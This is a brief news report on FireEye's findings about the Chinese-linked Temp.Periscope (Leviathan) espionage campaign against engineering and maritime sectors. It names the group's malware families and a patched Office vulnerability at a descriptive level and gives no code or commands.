A suspected Chinese-linked cyber espionage campaign dubbed Temp.Periscope has been targeting engineering and maritime industries. FireEye has observed a spike in the campaign activity since early 2018 and has tracked the activity since 2013.
According to FireEye, the bad actors have sharply escalated attacks this year on engineering and maritime industries connected to South China issues. The group also goes by name “Leviathan” as identified by other security firms.
Temp.Periscope uses a revised toolkit with a relatively large library of malware shared with multiple other suspected Chinese groups. A number of malicious tools have been used to include: AIRBREAK, BADFLICK, PHOTO, HOMEFRY, LUNCHMONEY, MURKYTOP and China Chopper.
A few of the tactics, techniques, and procedures (TTPs) include targeted spear phishing campaigns that use compromised emails accounts as well as exploitation of an MS Office memory corruption vulnerability (CVE-2017-11882) to drop malware on target systems. The vulnerability was patched last November.
The campaign also takes advantage of bitsadmin.exe and Powershell tools to download additional malicious tools, as well as use of Windows Management Instrumentation (WMI) for persistence.
The current TEMP.Periscope activity “likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations,” FireEye said in the report.